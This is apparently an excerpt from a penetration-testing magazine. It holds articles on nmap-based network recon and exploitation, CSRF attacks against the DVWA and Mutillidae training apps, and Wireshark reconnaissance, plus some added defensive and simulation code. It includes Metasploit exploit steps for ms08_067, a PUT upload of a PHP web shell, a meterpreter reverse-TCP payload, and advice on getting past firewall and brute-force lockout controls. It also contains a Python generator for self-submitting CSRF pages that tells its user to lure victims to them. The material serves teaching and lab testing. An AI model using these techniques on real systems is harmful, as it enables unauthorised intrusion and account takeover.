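    flags: str = ""   # "S" (SYN) or "A" (ACK) for tcp


@dataclass(frozen=True)
class Rule:
    """One 'pass' line of the firewall policy; anything unmatched is dropped."""
    dst: str = "any"
    proto: str = "any"
    ports: frozenset = frozenset()   # empty means any port
    keep_state: bool = False


def rule_matches(rule, probe):
    if rule.dst != "any" and rule.dst != probe.dst:
        return False
    if rule.proto != "any" and rule.proto != probe.proto:
        return False
    if rule.ports and probe.port not in rule.ports:
        return False
    # A stateful rule admits only packets that open a flow (SYN). A lone ACK
    # matches no existing state, so it is dropped even though the port is allowed.
    if rule.keep_state and probe.proto == "tcp" and probe.flags != "S":
        return False
    return True


def passes(rules, probe):
    """Inbound policy: any matching pass rule admits the packet; implicit 'drop all'."""
    return any(rule_matches(r, probe) for r in rules)


def sp_probes(dst):
    """`nmap -sP` as the article describes it: ICMP echo plus a TCP ACK to port 80."""
    return [Probe(dst, "icmp"), Probe(dst, "tcp", 80, "A")]


def ps_probes(dst, ports=(25, 53, 80)):
    """`nmap -sP -PS25,53,80`: a TCP SYN to each listed port."""
    return [Probe(dst, "tcp", p, "S") for p in ports]


def discover(rules, probe_fn):
    """A host is 'found' if at least one of its probes reaches it; a reached host
    always answers (echo reply, SYN/ACK, or RST for a closed port)."""
    return sorted(h for h in HOSTS if any(passes(rules, p) for p in probe_fn(h)))


def tcp(dst, port, keep_state=False):
    return Rule(dst, "tcp", frozenset({port}), keep_state)


# The article's rule sets (addresses read as 172.26.1.x, see the lead-in).
SCENARIOS = {
    1: [Rule()],                                             # pass from any to any
    2: [Rule(proto="tcp", ports=frozenset({80, 25, 53}))],   # generic rule set, drop all
    3: [tcp("172.26.1.2", 80), tcp("172.26.1.4", 53), tcp("172.26.1.6", 25)],
    4: [tcp("172.26.1.2", 80, True), tcp("172.26.1.4", 53, True),
        tcp("172.26.1.6", 25, True)],
}


def run_all():
    """Returns {scenario: (hosts found by -sP, hosts found by -sP -PS25,53,80)}."""
    return {n: (discover(rules, sp_probes), discover(rules, ps_probes))
            for n, rules in SCENARIOS.items()}


if __name__ == "__main__":
    for n, (sp, ps) in run_all().items():
        print("scenario %d: -sP finds %d host(s), -PS25,53,80 finds %d"
              % (n, len(sp), len(ps)))
```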

    Listing 3. OS detection with nmap

    nmap -O 172.26.1.10

    Starting Nmap ( http://nmap.org )
    Nmap scan report for 172.26.1.10
    Not shown: 994 closed ports
    PORT      STATE    SERVICE
    22/tcp    open     ssh
    80/tcp    open     http
    646/tcp   filtered ldp
    1720/tcp  filtered H.323/Q.931
    9929/tcp  open     nping-echo
    31337/tcp open     Elite
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6.39
    OS details: Linux 2.6.39
    Uptime guess: 1.674 days (since Mon Sep 9 12:03:04 2013)
    Network Distance: 10 hops
    TCP Sequence Prediction: Difficulty=205 (Good luck!)
    IP ID Sequence Generation: All zeros

    Listing 4. Services and version detection with nmap

    nmap -sV 172.26.1.2

    Starting Nmap ( http://nmap.org )
    Nmap scan report for 172.26.1.2
    Host is up (0.15s latency).
    Not shown: 992 closed ports
    PORT   STATE SERVICE VERSION
    80/tcp open  http    Microsoft IIS httpd 6.0

    nmap -sV 172.26.1.6

    Starting Nmap ( http://nmap.org )
    Nmap scan report for 172.26.1.6
    Host is up (0.016s latency).
    Not shown: 95 filtered ports
    PORT    STATE  SERVICE  VERSION
    22/tcp  open   ssh      OpenSSH 4.3 (protocol 2.0)
    25/tcp  open   smtp     Postfix smtpd
    80/tcp  open   http     Apache httpd 2.2.3 ((CentOS))
    113/tcp closed auth
    443/tcp open   ssl/http Apache httpd 2.2.3 ((CentOS))


    Vulnerability Detection

    This phase focuses on scanning hosts for open ports and identifying vulnerable services running on them, and prepares the groundwork for launching appropriate exploits in the exploitation phase.

    OS Detection with nmap: see Listing 3.

    Services and Version Detection with nmap: see Listing 4.

    Scanning a Firewall for Security Weaknesses

    A firewall may be blocking certain types of scans based on its rule set. Therefore, a pentester needs to probe it with unconventional scans which might get through a generic rule set. Once the allowed packet types are known, the internal network can be probed further.

    TCP Null Scan:  nmap -sN 192.168.5.1
    TCP FIN Scan:   nmap -sF 192.168.5.1
    TCP X-MAS Scan: nmap -sX 192.168.5.1

    Scanning a Firewall for Packet Fragments

    In order to identify the MTU (Maximum Transmission Unit) size allowed by the firewall, it can be probed with various packet fragment sizes.

    nmap -f 10 192.168.5.1
    nmap --mtu 32 192.168.5.1

    This will split up the TCP header over several packets to bypass detection by packet filters/IDS (Intrusion Detection Systems).

    Vulnerability Scanning of Hosts with Nessus/OpenVAS

    Vulnerability scanners like Nessus and OpenVAS provide a deep insight into the weaknesses of the scanned hosts. These tools also map the criticality of the weaknesses discovered on a scale of High, Medium, and Low, along with CVE (Common Vulnerabilities and Exposures) identifiers and exploits.

    Web Application Scanning and Enumeration

    Web application scanning involves enumeration, testing, and analysis of application servers, web technologies, CMS (Content Management System), database server, authentication and authorization mechanisms, session management, injection flaws, and business layer logic. OWASP (Open Web Application Security Project) has classified various weaknesses/vulnerabilities associated with web applications under the OWASP Top 10.

    Figure 5. Burpsuite web proxy


    Using Automated Scanning Tools: W3af / Acunetix / Netsparker

    A typical web application can be scanned for vulnerabilities by various automated scanning tools like w3af, Acunetix, Netsparker, and more. These tools probe the application with a variety of payloads for detecting well-known vulnerabilities. The result of a probe is based entirely on a typical response code/header/format. Therefore, such scans are prone to false positives and, more worryingly, false negatives.

    Manual Probing using Web Proxies: ZAP / WebScarab / Burp Suite

    Web proxies give the pentester the ability to intercept, analyze, tamper with, and inject payloads into the requests/responses communicated between the client's browser and the web application server.

    This approach empowers the pentester to test the application for entry points by manipulating request/response headers himself. Also, the business logic layer of the application can be manually evaluated, unlike with most automated tools.

    Brute-forcing Directory Paths using DirBuster

    DirBuster lists accessible directories on a web server by brute-forcing common directory names and paths. This tool often reveals important configuration files/administrator files on a misconfigured web server (Figure 6).

    Figure 6. Directory brute forcing by DirBuster

    Testing for SQLi using Havij/Sqlmap

    Tools like Havij and sqlmap enable the pentester to test the web application for potential SQLi (SQL Injection) flaws.

    python sqlmap.py -u "http://172.26.1.2/page.php?id=5"

    This will test the URL parameter id against a set of injection payloads. If the application is found vulnerable, the entire database can be accessed and taken over.

    Common CMS Enumeration using wpscan/joomscan/DPScan

    Enumeration of the versions and modules of common CMS (Content Management Systems) such as Drupal, Joomla, or WordPress can be done by automated scripts/tools like wpscan, joomscan, and DPScan (Figure 7).

    Figure 7. Content Management System Enumeration

    Discovery of vulnerable CMS versions/modules may lead to complete web application exploitation and control at a later stage.

    Exploitation

    This is the final phase of a penetration testing attack, which involves exploitation of the vulnerabilities discovered in previous phases. Successful exploitation will provide complete control of hosts to the pentester.

    Exploiting Default Configurations

    More often than not, devices/systems/servers are found left in their default configurations. A pentester should look for default ports/services commonly used for remote administration of firewalls/network devices. A comprehensive list of default passwords for various devices can be found at www.routerpasswords.com. Once control of a firewall/device has been obtained, modifying rule sets/ACLs and exploiting internal hosts is a cakewalk for the pentester.

    Not only network devices but servers are also prone to this misconfiguration flaw. A default CMS login or a publicly accessible configuration file discovered by DirBuster can give complete control of the web server to a pentester.

    Password Cracking

    In case there is no joy with default passwords, the password cracking approach may be resorted to. Dictionary or brute-force attacks using tools like Hydra, Brutus, Medusa, and more, provide a pentester with privileged access to the application. These tools can also be configured to restart the brute-force session after a certain number of attempts so as to bypass the restriction on maximum invalid attempts in a particular session.

    Hash Cracking

    Exploiting a web application database with SQLi often provides passwords in hashed form. Such hashes can be broken using tools like Hashcat, rainbow tables, and others.

    Exploit Launching

    Based on vulnerabilities detected in the vulnerability scanning phase, relevant exploits can be launched on hosts using tools like Metasploit, Core Impact, Canvas, and more.

    msf > use exploit/windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > show targets
    ...targets...
    msf exploit(ms08_067_netapi) > set TARGET <target-id>
    msf exploit(ms08_067_netapi) > show options
    ...show and set options...
    msf exploit(ms08_067_netapi) > exploit

    Exploiting dangerous HTTP methods discovered in the reconnaissance phase: the PUT method discovered in the recce phase can be exploited to upload a PHP web shell on the web server.

    nc 172.26.1.2 80
    PUT /evil.php HTTP/1.0
    Content-type: text/html
    Content-length: 250

    The uploaded web shell will be available at http://172.26.1.2/evil.php, which in turn will provide access to the file system of the web server. Instead of a web shell, evil.php can also be a Metasploit PHP payload.

    msf > use payload/php/meterpreter_reverse_tcp
    msf payload(meterpreter_reverse_tcp) > show options
    ...show and set options...
    msf payload(meterpreter_reverse_tcp) > run

    This will facilitate an interactive Meterpreter session on the web server, which could be exploited further for privilege escalation.

    Web Application Fuzzing

    A pentester should employ various means to bypass authentication and authorization restrictions in a web application. Cookie stealing by using Cross-Site Scripting attacks may allow the attacker to hijack a valid user session. SQLi may provide database access, and CMS vulnerability exploitation can give website control to the attacker. Based on the version/vulnerabilities in the CMS detected in the previous phase, an attacker can launch exploits on the CMS. Business logic bypass/fuzzing can allow an authenticated user to escalate his privileges. Most of the time, applications authenticate a user from the database and then authorize the user to certain roles based on the cookie value set for him. Such a loosely bound authorization model can be exploited by tampering cookie values (using Zed Attack Proxy, Burp Suite, Firebug, or Tamper Data) to those of an administrator so as to gain administrator privileges (Figure 8).

    Figure 8. Cookie tampering using Tamper Data

    Exploiting Anonymous Login

    A pentester should look for anonymous FTP or anonymous SSH login possibilities on the target servers. Nmap and Metasploit have NSE (Nmap Scripting Engine) scripts and auxiliaries respectively for finding and exploiting such vulnerabilities.

    Logging in to anonymous FTP is presented in Listing 5. Exploiting the FTP/SSH server: after logging in to the FTP/SSH server, one could PUT/WGET a local privilege escalation exploit and execute it to get the server shell.

    Exploiting SMTP Open Relay

    A pentester should evaluate if the SMTP mail server is vulnerable to mail relaying. A vulnerable SMTP open relay server doesn't verify if the user is authorized to send e-mail from the specified e-mail address. Therefore, an attacker could spoof or impersonate any e-mail address for sending e-mails.

    The following nmap NSE script can be used to find open relay mail servers:

    nmap --script smtp-open-relay.nse [--script-args smtp-open-relay.domain=<domain>,smtp-open-relay.ip=<address>,...] -p 25,465,587 <host>

    The following Metasploit auxiliary can be used to scan for open relay mail servers:

    msf > use auxiliary/scanner/smtp/smtp_relay
    msf auxiliary(smtp_relay) > show actions
    ...actions...
    msf auxiliary(smtp_relay) > set ACTION <action>
    msf auxiliary(smtp_relay) > show options
    ...show and set options...
    msf auxiliary(smtp_relay) > run

    Social Engineering

    Social engineering attacks like phishing, baiting, impersonating, tab-nabbing, click-jacking, and so on, can be employed for human exploitation.

    Summary

    Penetration testing of an organization puts the various controls of its security architecture to the test. It is not just checking the existence of required controls but that the controls are appropriate and sufficient to mitigate the overall risk. In order to evaluate a layered defence, a multi-pronged attack approach is required to find an entry point. A typical pentesting attack comprises three phases: reconnaissance, vulnerability detection, and exploitation. The reconnaissance phase focuses on information gathering about the target environment, the vulnerability detection phase is meant for exploring vulnerable ports and services on discovered hosts, and the idea of the exploitation phase is to exploit the detected vulnerabilities. A well-equipped security fortress can also be penetrated through a small hole. It just requires hard work, knowledge, and experience.

    Sumit Agarwal

    MS Information Security and Cyber Law, CISSP, CISA, STQC-CISP, ISMS LA, C|HFI, E|CSA, C|EH, is Team Lead at a renowned Cyber Incident Response Team (CIRT). He has undertaken many cyber forensics investigations, vulnerability assessment, and penetration testing assignments during his experience of seven years in this domain. He can be reached at [email protected].

    Listing 5. Logging in to Anonymous FTP

    ftp 172.26.1.5
    Connected to 172.26.1.5.
    220 Welcome to my FTP service.
    Name (172.26.1.5:root): anonymous
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls

    Logging in to Anonymous SSH:

    ssh 172.26.1.10 -l anonymous
    anonymous@172.26.1.10's password:
    Last login: Fri Sep 13 23:24:27 2013 from 192.168.5.7
    -bash-3.2$ ls

    References

    http://nmap.org
    http://www.offensive-security.com


    Automating POST-Method CSRF Attacks

    Of the various implementation flaws that are commonly found on web applications, CSRF (Cross-Site Request Forgery) is one of the lesser-known, and as such, more frequently overlooked vulnerabilities. Unlike common server-side vulnerabilities (SQL injection, directory traversal, file inclusion, etc.), CSRF attacks do not directly attack the server. It is often compared to XSS (Cross-Site Scripting), but really this isn't accurate either. XSS exploits a vulnerability on a target server to access, manipulate, and exploit data on the client side. Really, CSRF does just the opposite. CSRF uses an unsuspecting client system's browser to manipulate data and/or perform unauthorized transactions on the server side (although this data is often unique to the user's account, profile, session, and so on). In this essay, I am going to discuss what a CSRF attack is, the distinction between GET-method and POST-method CSRF vulnerabilities, and how to streamline the exploitation process for more effective testing.

    What is Cross-Site Request Forgery?

    Cross-Site Request Forgery is commonly referred to as a confused deputy attack. This terminology paints an accurate picture of what is going on in the background. Consider a scenario in which a malicious person, who does not have access to a certain building, desires to gain access to that building to accomplish a particular task. Guarding the building, there is a deputy who has authorization to get inside. One approach could be to charge the building with guns blazing, but this will most likely not end well for anyone. A more effective strategy would be for the malicious person to devise a scheme in which he tricks the deputy into performing the desired task on his behalf. This is exactly what happens in a CSRF attack. The web browser of the client system acts as the confused deputy. There are several steps involved in a successful CSRF attack:

    The client web browser must be trusted and authorized to access and manipulate certain content within the web application (in the same way that the deputy was a trusted agent at the building). This is usually accomplished by some sort of authentication mechanism, such as a user login portal.

    The parameters of the transaction will be supplied by an unauthorized third party (in the same way that the deputy's idea to perform that malicious task was inspired by the intruder). This can be accomplished in various different ways, including iframe injection or social engineering.

    The transaction will be completed without question because of the session ID and cookies supplied by the client browser (in the same way that the deputy could complete the task without question because of his position of authority).

    Lab Environment for CSRF Attacks

    In this essay, I am going to address CSRF attacks using both GET and POST HTTP methods. Both of the applications that I am going to use to demonstrate these attacks are publicly available for download and use. The first web application that I will be using is DVWA, which is available at http://www.dvwa.co.uk/. The second web application is Mutillidae, which is available at http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10. Each of these is a deliberately vulnerable web application that can be hosted within your own lab environment and can be used for penetration testing training and research. However, to save yourself the frustration of having to set up and configure each of these web applications independently, I recommend that you just download Metasploitable2. Metasploitable2 is a Linux server that is also intentionally vulnerable. Both of the discussed web applications are already configured on the server upon install, and can be accessed via the HTTP service hosted on TCP port 80. Metasploitable2 can be downloaded at http://sourceforge.net/projects/metasploitable/files/Metasploitable2/.

    GET Method CSRF Attack

    The easiest CSRF vulnerabilities to exploit are those that involve modifying parameters that can be supplied to a server via a GET request. This is an extremely critical vulnerability because it can be exploited without the use of any special tools or scripting. I will use DVWA to demonstrate such a scenario. After logging in to the application with the administrator account, select the DVWA Security option and set the security level to low. Then select the CSRF option on the left side of the page. You will notice that a web application is displayed that can be used to update the password for the admin user account. See Figure 1 for an image of the web application.

    For the purpose of this exercise, I have decided to update the password to "password" and have entered it into both fields. Prior to submitting a request, I configured Burp Suite to function as an intercepting proxy to capture the request that would be sent to the server to update the password. Figure 2 shows the GET method request that was submitted.

    Notice that both of the parameters (password_new and password_conf) are actually passed as arguments in the relative URL that is displayed in the GET request. As you might imagine, this vulnerability can be exploited by simply crafting a link with hardcoded parameters and then enticing an authenticated user to browse to that link. Let's suppose that a malicious intruder wants to trick the administrator into updating his password to a new password that the intruder has chosen (in this case, we will use badguypass). He could simply create the following hyperlink: http://192.168.223.132/dvwa/vulnerabilities/csrf/?password_new=badguypass&password_conf=badguypass&Change=Change. Once the link is created, the intruder could use some well-crafted social engineering techniques to persuade the victim to click on the link. As soon as the victim browses to the site, the parameters are supplied in conjunction with the user's session ID and cookies. The victim's password is then automatically updated without his consent.

    Figure 1. DVWA application to update admin password

    Figure 2. GET request to update admin password in DVWA


    Although we do live in a world where most web developers are not extremely security conscious, they at least understand enough about the application's functionality to realize that this sort of approach to performing a secure transaction is a huge mistake. Because of this, you will not commonly see this sort of CSRF vulnerability in the wild. It is much more likely that you will run into CSRF vulnerabilities that are associated with the use of the HTTP POST method.

    POST Method CSRF Attack

    Mutillidae provides a good example of a POST method CSRF vulnerable web application. To get started, open up Mutillidae in the web browser and then browse through the menu OWASP Top 10 > Cross Site Request Forgery > Register User. Using this first application, you should create a user account that can be used to simulate the CSRF victim. Once you have completed the form, select the Create Account button. Then browse through the menu once again: OWASP Top 10 > Cross Site Request Forgery > Add to your blog. A blogging web application will be displayed. Take note of the fact that we have not yet logged in with an account and that the blog is currently set to anonymous. This will change after we log in with the user account we previously created. However, prior to logging in, you will need to use a local intercepting proxy to capture the POST request that is supplied when submitting a blog entry. We will then use this template to build our CSRF attack. Figure 3 shows the POST request form that is submitted when I submit a blog entry of TEST.

    Notice that, unlike the GET request that was used by DVWA, the parameters here are not supplied to the server within the relative path or the URL. Instead, the parameters are supplied as POST method data that can be seen at the bottom of the request. This makes a successful attack more difficult, since you can't simply provide a modified link to an unsuspecting victim. Instead, we need to figure out a way to have the victim submit a POST request to the vulnerable server with all necessary POST data included. One way to accomplish this task is to host a malicious web page that will use embedded script(s) to supply the data.

    The example that I am going to provide was done in BackTrack 5 R3. First, I started the Apache HTTP service on my BackTrack system by browsing through the main menu Applications > BackTrack > Services > HTTPD > apache start. The default webroot directory in this distribution of BackTrack is located in /var/www/. So this is the location where we will need to create our malicious site. To do this, change the current directory and then use your preferred text editor to generate the file.

    cd /var/www/
    nano evil.html

    An example of an HTML file with embedded JavaScript that could be used to perform the CSRF attack against this Mutillidae application can be seen in Listing 1.

    In the case that an unsuspecting user browses to this HTML code, the JavaScript will execute on their system. It will redirect them to the location specified in the action field and will supply the POST parameters specified by the following input fields. Their browser will submit any cookies and session IDs established with the vulnerable server in order to complete the CSRF transaction.

    To test this attack, browse to the top of the Mutillidae application and select Login/Register to log into the victim account that you had previously registered. Now look at the blog associated with this user. Because this is the first time logging in with this account and because the blog is user-specific, there should be no posts at this time. Now suppose that some malicious third party sent a link to the web page that is now hosted on the BackTrack system. You can simulate this by browsing to the malicious web page at http://127.0.0.1/evil.html. Upon doing this, you will be redirected back to the blog page and should notice that a new blog entry has been created without your consent, and the contents of this blog entry contain the same text that was supplied by the blog_entry POST parameter in the JavaScript. In this way, an unauthorized transaction was completed without the consent of the user, by browsing to the malicious web content (see Figure 4). Consider the potential implications of this type of vulnerability, given the types of transactions that are often completed by POST parameters: profile changes, online purchases, banking transactions, and so on.

    Figure 3. POST request for blog entry submission in Mutillidae

    Listing 1. HTML and JavaScript to exploit Mutillidae POST method CSRF vulnerability

    document.csrf.submit();

    Figure 4. Execution of unauthorized transaction in Mutillidae via CSRF attack
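    The blog transaction above goes through because the browser attaches the session cookie to whatever form evil.html submits. The server-side check that stops it is shown in the following added example (not the article's code): a per-session synchronizer token rendered into the genuine form and required on every state-changing POST, plus an Origin check and a refusal of state changes over GET. SessionStore, render_blog_form, token_from_form and handle_blog_post are this example's own names; the site origin is the DVWA host address used earlier in the article.

```python
"""Server-side CSRF defence for a blog_entry form (added example, not the
article's code). The forged page cannot read the token from the victim's
session, so its auto-submitted POST is refused even though the cookie is sent."""
import hmac
import re
import secrets

SITE_ORIGIN = "http://192.168.223.132"   # the application's own origin (assumed)


class SessionStore:
    """Minimal in-memory session table keyed by the session-cookie value."""

    def __init__(self):
        self._sessions = {}

    def login(self, username):
        sid = secrets.token_urlsafe(32)
        # One unguessable CSRF token per session, kept server-side.
        self._sessions[sid] = {"user": username,
                               "csrf": secrets.token_urlsafe(32),
                               "blog": []}
        return sid

    def get(self, sid):
        return self._sessions.get(sid)


def render_blog_form(store, sid):
    """The genuine page: the token travels in the HTML body, not in the cookie,
    so the browser will not attach it to a request forged by another site."""
    token = store.get(sid)["csrf"]
    return ('<form method="POST" action="/blog">'
            '<input type="hidden" name="csrf_token" value="%s">'
            '<input name="blog_entry"><input type="submit" value="Save"></form>' % token)


def token_from_form(html):
    """What the legitimate browser does implicitly: pick the hidden field up."""
    return re.search(r'name="csrf_token" value="([^"]+)"', html).group(1)


def handle_blog_post(store, cookie_sid, method, form, origin=None):
    """Server handler for the blog form. Returns (status, message).
    `form` is the parsed request body; `origin` is the Origin header, if sent."""
    session = store.get(cookie_sid)
    if session is None:
        return 401, "not logged in"
    # State changes only via POST: a DVWA-style GET link never reaches the update.
    if method != "POST":
        return 405, "state change must use POST"
    # Defence 1: the token in the body must match the one bound to this session.
    # compare_digest keeps the comparison constant-time.
    if not hmac.compare_digest(form.get("csrf_token", ""), session["csrf"]):
        return 403, "missing or invalid CSRF token"
    # Defence 2: if the browser sent an Origin header, it must be our own site.
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-origin request refused"
    session["blog"].append(form.get("blog_entry", ""))
    return 200, "entry added"


if __name__ == "__main__":
    store = SessionStore()
    sid = store.login("victim")
    # evil.html's form: the browser attaches the cookie, but no token is present.
    print("forged:", handle_blog_post(store, sid, "POST", {"blog_entry": "TEST"},
                                      origin="http://127.0.0.1"))
    tok = token_from_form(render_blog_form(store, sid))
    print("genuine:", handle_blog_post(store, sid, "POST",
                                       {"blog_entry": "TEST", "csrf_token": tok},
                                       origin=SITE_ORIGIN))
```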

    Automating POST Method CSRF

    In testing for CSRF vulnerabilities, I have discovered that this template can be effective to exploit most POST method vulnerabilities. To save the time of having to develop unique HTML/JavaScript code for each instance of a POST method CSRF vulnerability, I have developed a Python script that will actually write the HTML code itself and will automatically place it in the /var/www/ directory. This script can be seen in Listing 2.

    Listing 2. CSRF Generator Python Script to automate POST method CSRF exploitation testing

    #!/usr/bin/python
    # Python 2 script as printed in the article. The string quotes and the HTML
    # tags inside the write() calls were lost in extraction and are restored here
    # from the article's description of the generated page: a form named "csrf"
    # posting to the supplied URL, one hidden input per parameter, and a script
    # that calls document.csrf.submit(). The <title> text is a placeholder.

    print "\n********** CSRF HTML/JAVASCRIPT GENERATOR - H@ck1tHu7ch **********\n\n"
    print ("USE: This script is intended to generate malicious HTML code with an embedded javascript, "
           "\nthat can be used to perform POST-based CSRF (Cross-site Request Forgery) attacks. "
           "\nPrior to using this script, ensure that the apache HTTP service is running "
           "\nand that the webroot for this service is located at /var/www. "
           "\n\n\n*****************************************\n\n")

    # Part one: gather the target URL, the parameter count and the output file name.
    url = raw_input("Enter the URL of the CSRF vulnerable target:\n")
    params = raw_input("\nEnter the number of POST parameters to be supplied:\n")
    html = raw_input("\nEnter the filename to be generated (example - evil.html):\n")
    filepath = "/var/www/" + html

    # Each parameter's name and value is collected into the dictionary 'dict'.
    dict = {}
    i = 0
    while (i < int(params)):
        i = i + 1
        print "\n\n*** PARAMETER #" + str(i) + " ***\n"
        name = raw_input("Enter the NAME of parameter " + str(i) + ":\n")
        val = raw_input("Enter the VALUE of parameter " + str(i) + ":\n")
        dict[str(name)] = str(val)

    # Part two: write the page, a self-submitting POST form carrying the parameters.
    file = open(filepath, "a")
    file.write("<html>\n")
    file.write("<head>\n")
    file.write("\t<title>CSRF</title>\n")
    file.write("</head>\n")
    file.write("<body>\n")
    file.write("\t<form name=\"csrf\" action=\"" + url + "\" method=\"POST\">\n")
    for x in dict:
        file.write("\t\t<input type=\"hidden\" name=\"" + x + "\" value=\"" + dict[x] + "\">\n")
    file.write("\t</form>\n")
    file.write("\t<script>\n")
    file.write("\t\tdocument.csrf.submit();\n")
    file.write("\t</script>\n")
    file.write("</body>\n")
    file.write("</html>\n")
    file.close()

    print ("\n*** The script has written the HTML code to the file " + filepath +
           "\nand should be accessible via the web-browser at \nhttp://127.0.0.1/" + html + " ***\n")

    print ("\nTo complete CSRF attack, entice the victim (who has already established "
           "\na trusted session on his/her browser) through social engineering or "
           "\niframe injection, to browse to the malicious site\n\n")

    There are two major functional parts of this script. The first part of the script gathers user-supplied input regarding the vulnerable URL, the number of POST parameters, and the name of the output HTML file. Each of these supplied values is then assigned to a variable within the Python script. I have also used a while loop to loop through the number of POST parameters. For each parameter, user input is requested to include both the name and value. These are then placed into a dictionary called dict. The second functional part of the script is the part that actually generates the HTML output. Much of this is hardcoded. However, the previously supplied user input from the first part is also used to help generate the file. The previously supplied URL is supplied by calling on the url variable. And a for loop is used to write each of the POST parameters from the dictionary into the HTML content. Upon running this script, you can then test the CSRF exploit in the same way that we had done in the previous example.

    About the Author

    Justin Hutchens (OSCP, CISSP, CNDA, CEH, ECSA, CHFI) previously worked for the United States Air Force as a network vulnerability analyst. During that time, he supported a large enterprise network with over 55,000 networked systems and performed a wide range of tasks including vulnerability assessments, intrusion detection, and incident response. He currently works as a security consultant and performs security assessments and penetration tests for both corporate and government clients. He was also the writer and developer of Kali Linux Backtrack Evolved: Assuring Security by Penetration Testing, a video training series that covers the entire penetration testing process using the Kali Linux operating system. This course is currently available from Packt Publishing (www.packtpub.com). Justin is available for contact at www.linkedin.com/in/justin-hutchens.

    Basic Black Hat recon with WiresharkPicture the situation: You wake up in a locked room, no windows, no signs of where you are, the door is locked and all you have is your trusty laptop and cat 5 network lead coming out of the wall. What do you do? OK, it is a little far-fetched but you get the point. On unknown networks and black hat testing, Wireshark is a must-have tool to find critical information about your surroundings, infrastructure and potential vulnerabilities.

    For the purposes of this tutorial I am run-ning Kali 64 bit KDE, although other options (Backtrack 5 etc.) are available, I find this operating system and tool set the best for my day to day cyber-security life.

I'm Listening...

First things first: I want to confirm that the network connection is live and find out as much as possible about what other equipment is on the network. No network interface should ever be set to auto-connect, so I can start Wireshark listening on eth0 (my primary network card) before the lead is plugged in, then connect it without any DHCP request or other outbound data going out on the unknown network.

Wireshark is an open source packet capture application, capable of listening to and recording both transmitted and received data from Ethernet cards, fibre cards, USB and virtual interfaces. The default GUI view, from the top down, is: Packet List, showing real-time and historical packets sent and received on the interface; Packet Details, an easy-to-read breakdown of the selected packet with source, destination and decoded contents; and finally Packet Bytes, the raw packet in hex and ASCII.

Once we have connected the lead, traffic starts flooding in at regular intervals. Cisco and Juniper switches are notoriously chatty in their default configuration (CDP, LLDP, spanning tree and similar). It is usually possible to determine the type of kit in use on a network just by listening to port responses and network broadcasts. With switch heartbeats and appliance discovery traffic, our view of the network infrastructure starts to expand.

Figure 1. The main Wireshark interface

After sitting and waiting for a while we start to see more traffic on the LAN, which can provide us with details on the IP structure and addressing in use. Wireshark can capture network broadcast traffic and, by the use of ARP poisoning (discussed later), direct point-to-point traffic for use in a man-in-the-middle attack. However, on the majority of Windows networks the workstations and servers are always advertising themselves in broadcast mode. The image below shows a Windows 7 workstation booting up and announcing its presence on the network. By reviewing the packet's contents in the bottom window we can determine that the workstation's name is ITHC-PC and it is presently part of a domain called INFOSEC0. For the keen-eyed, we can see the default IP address of a network card pre-DHCP request. The MAC address is also visible (we should make a note of this for later in case MAC filtering is in use on the network). Our newly discovered host has successfully picked up an IP address, proving the use of DHCP on the network.

Figure 2. NetBIOS name packets and DHCP request capture
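What Wireshark is decoding in the NetBIOS name packets of Figure 2, as an added example that is not part of the article: a small parser for NBNS name registration requests, the broadcast a Windows host sends at boot to claim its name. NetBIOS names travel "first-level encoded" (each byte split into two nibbles, each nibble plus 'A'), padded to 15 characters with a 16th suffix byte that says whether the name is a workstation, a file server or a domain group. The packets built here are constructed, with assumed IP addresses; the host and domain names are the ones visible in the article's capture.

```python
import struct

# NetBIOS name suffix (16th byte) values commonly seen in registrations.
NB_SUFFIX = {
    0x00: "workstation",
    0x03: "messenger",
    0x1B: "domain master browser",
    0x1C: "domain controllers",
    0x1D: "master browser",
    0x20: "file server",
}

def nb_encode(name: str, suffix: int) -> bytes:
    """First-level encode: pad the name to 15 chars, append the suffix byte,
    then emit two 'A'-based nibble characters per byte (always 32 bytes)."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    out = bytearray()
    for b in raw:
        out.append(0x41 + (b >> 4))
        out.append(0x41 + (b & 0x0F))
    return bytes(out)

def nb_decode(encoded: bytes):
    """Reverse of nb_encode; returns (name, suffix)."""
    if len(encoded) != 32:
        raise ValueError("encoded NetBIOS name must be 32 bytes")
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]

def build_registration(name: str, suffix: int, ip: str, txid: int = 0x8000) -> bytes:
    """Constructed NBNS name registration request (opcode 5, broadcast): a 12-byte
    header, one question (NB record) and one additional record carrying the address
    the host is claiming. Assumed addresses; not captured data."""
    flags = 0x2910  # opcode 5 (registration), recursion desired, broadcast
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 1)
    qname = b"\x20" + nb_encode(name, suffix) + b"\x00"
    question = qname + struct.pack("!HH", 0x0020, 0x0001)        # type NB, class IN
    rdata = struct.pack("!H", 0x0000) + bytes(int(o) for o in ip.split("."))
    additional = b"\xC0\x0C" + struct.pack("!HHIH", 0x0020, 0x0001, 300000, len(rdata)) + rdata
    return header + question + additional

def parse_registration(pkt: bytes):
    """Pull the registering name, its suffix/role and the claimed IP out of a registration."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    if (flags >> 11) & 0x0F != 5:
        raise ValueError("not an NBNS registration")
    off = 12
    length = pkt[off]
    off += 1
    name, suffix = nb_decode(pkt[off:off + length])
    off += length + 1 + 4          # name, its terminator, qtype + qclass
    ip = None
    if ar:
        off += 2 + 10              # compressed name pointer, type/class/ttl/rdlength
        ip = ".".join(str(b) for b in pkt[off + 2:off + 6])   # skip 2-byte NB flags
    return {"name": name, "suffix": suffix, "role": NB_SUFFIX.get(suffix, "unknown"), "ip": ip}
```

Run over a real capture, the same decoder applied to every UDP/137 payload gives the hostnames and domain groups the article reads off Figure 2, without ever sending a packet.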

Patience is a Virtue...

As further time passes we can also detect other workstations, domain controllers, the domain name, user accounts and even broadcasts from a particular vendor for antivirus updates. All the time we are collecting more and more reconnaissance and building a mental picture of our surroundings. In the majority of corporate networks I have scanned it is possible to determine the company name from the domain name. In some organisations the server naming conventions can indicate the target server's purpose.

